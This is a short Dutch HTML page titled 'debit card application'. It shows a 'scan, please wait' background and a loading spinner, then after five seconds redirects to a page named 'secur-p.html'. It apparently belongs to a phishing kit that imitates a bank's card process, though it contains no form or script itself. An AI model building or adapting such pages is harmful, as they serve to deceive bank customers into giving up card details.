<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><title>Aanvraag betaalpas</title>

<link rel="shortcut icon" href="fav1.ico">
<link rel="icon" type="image/x-icon" href="fav1.ico">
<style type="text/css">
body {
text-decoration: none;
font-family: Arial,Helvetica,sans-serif;
background-repeat: no-repeat;
background-position: left top;
background-image: url(Xackground-1-scan_wait.png);
}
</style>
<meta http-equiv="refresh" content="5;URL='secur-p.html'">
</head>
<body>
<img style="position: absolute; width: 96px; height: 96px; top: 502px; left: 454px;" alt="loading" src="lade.gif"><br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
</body></html>
